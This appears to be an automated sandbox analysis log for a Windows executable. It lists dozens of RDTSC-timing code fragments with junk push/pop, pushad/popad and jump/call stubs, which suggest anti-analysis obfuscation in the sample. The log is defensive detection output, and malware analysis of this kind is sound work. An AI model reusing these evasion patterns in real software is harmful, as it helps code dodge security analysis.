Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AAC0 second address: 103AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AAD4 second address: 103AAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AAE3 second address: 103AAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AAE9 second address: 103AAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041449 second address: 104144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104144D second address: 1041451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1040E99 second address: 1040EAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1040EAF second address: 1040ED4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F70146AC616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F70146AC606h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1040ED4 second address: 1040ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10466D0 second address: 10466D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDEA9 second address: FFDEC6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7014CC2CB8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F7014CC2CB6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDEC6 second address: FFDECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDECA second address: FFDFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov di, bx 0x00000025 mov dword ptr [ebp+122D287Fh], ecx 0x0000002b push dword ptr fs:[00000000h] 0x00000032 or edx, 53F6E934h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f adc dx, 2C55h 0x00000044 mov dword ptr [ebp+12471B19h], esp 0x0000004a movzx edi, ax 0x0000004d cmp dword ptr [ebp+122D33DDh], 00000000h 0x00000054 jne 00007F7014CC2DAAh 0x0000005a jmp 00007F7014CC2CC6h 0x0000005f mov byte ptr [ebp+122D27FFh], 00000047h 0x00000066 sub cl, 0000002Ch 0x00000069 call 00007F7014CC2CC5h 0x0000006e jmp 00007F7014CC2CC6h 0x00000073 pop edx 0x00000074 mov eax, D49AA7D2h 0x00000079 mov dword ptr [ebp+122D1C42h], edx 0x0000007f nop 0x00000080 jnl 00007F7014CC2CCBh 0x00000086 jmp 00007F7014CC2CC5h 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f jmp 00007F7014CC2CC0h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE296 second address: FFE2A0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE475 second address: FFE491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE491 second address: FFE497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE497 second address: FFE49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE49B second address: FFE4C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70146AC610h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE4C6 second address: FFE4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F7014CC2CC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE4EB second address: FFE4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE5C8 second address: FFE5EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE5EB second address: FFE5F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE654 second address: FFE659 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE659 second address: FFE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F70146AC613h 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F70146AC608h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx ecx, si 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F70146AC60Dh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE6AE second address: FFE6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE6B2 second address: FFE6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE6B8 second address: FFE6FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBFh 0x00000008 jmp 00007F7014CC2CC9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jl 00007F7014CC2CD2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7014CC2CC0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE6FF second address: FFE703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE976 second address: FFE98C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE98C second address: FFE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F70146AC608h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F70146AC608h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d nop 0x0000003e jc 00007F70146AC61Fh 0x00000044 push eax 0x00000045 push edx 0x00000046 jne 00007F70146AC606h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE9EB second address: FFEA06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F7014CC2CB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEDBD second address: FFEDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEDC1 second address: FFEDE6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7014CC2CC1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEF84 second address: FFEF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF11C second address: FFF121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF1FF second address: FFF2C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F70146AC60Bh 0x0000000f lea eax, dword ptr [ebp+12471B05h] 0x00000015 jnp 00007F70146AC606h 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F70146AC612h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007F70146AC612h 0x0000002b popad 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F70146AC608h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 lea eax, dword ptr [ebp+12471AC1h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F70146AC608h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 nop 0x0000006a jmp 00007F70146AC60Ch 0x0000006f push eax 0x00000070 push ecx 0x00000071 push eax 0x00000072 push edx 0x00000073 push edi 0x00000074 pop edi 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF2C0 second address: FE3DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D2E38h], ecx 0x00000028 call dword ptr [ebp+122D19A9h] 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 jmp 00007F7014CC2CBAh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1045D1F second address: 1045D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F70146AC606h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1045EA6 second address: 1045EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1045EC3 second address: 1045ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104604E second address: 10460BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 jmp 00007F7014CC2CC8h 0x0000000e popad 0x0000000f ja 00007F7014CC2CBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7014CC2CC9h 0x0000001c jmp 00007F7014CC2CC8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10460BF second address: 10460C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C611 second address: 104C617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C617 second address: 104C62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C62A second address: 104C631 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DD40 second address: 104DD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Eh 0x00000009 pop edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jo 00007F70146AC606h 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007F70146AC60Ch 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DD74 second address: 104DD96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7014CC2CB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F7014CC2CC1h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10500C9 second address: 10500CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10500CF second address: 10500E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7014CC2CBDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104FC5F second address: 104FC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104FC64 second address: 104FC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105286C second address: 105288A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ch 0x00000007 jnl 00007F70146AC606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F70146AC608h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052C9C second address: 1052CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052CBB second address: 1052CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F70146AC606h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052CC8 second address: 1052CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052CCE second address: 1052CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC619h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057D71 second address: 1057D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1058127 second address: 1058131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1058295 second address: 10582A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4181 second address: FC4187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4187 second address: FC418C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC418C second address: FC419B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC419B second address: FC41AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F7014CC2CB6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105B058 second address: 105B06A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105B06A second address: 105B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106101D second address: 106104F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70146AC616h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105FAA2 second address: 105FABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7014CC2CB6h 0x0000000a jmp 00007F7014CC2CC0h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105FBE1 second address: 105FC12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnp 00007F70146AC606h 0x0000000d js 00007F70146AC606h 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f jmp 00007F70146AC611h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEC65 second address: FFEC8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F7014CC2CC2h 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jg 00007F7014CC2CBCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEC8E second address: FFEC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F70146AC606h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1060D03 second address: 1060D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10672C8 second address: 10672CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067499 second address: 106749F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10679B5 second address: 10679B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068187 second address: 1068193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068193 second address: 1068197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068758 second address: 106877C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7014CC2CBFh 0x00000010 push ebx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10689F7 second address: 10689FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10689FD second address: 1068A18 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 je 00007F7014CC2CB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068A18 second address: 1068A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068D22 second address: 1068D2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068D2C second address: 1068D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C134 second address: 106C13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
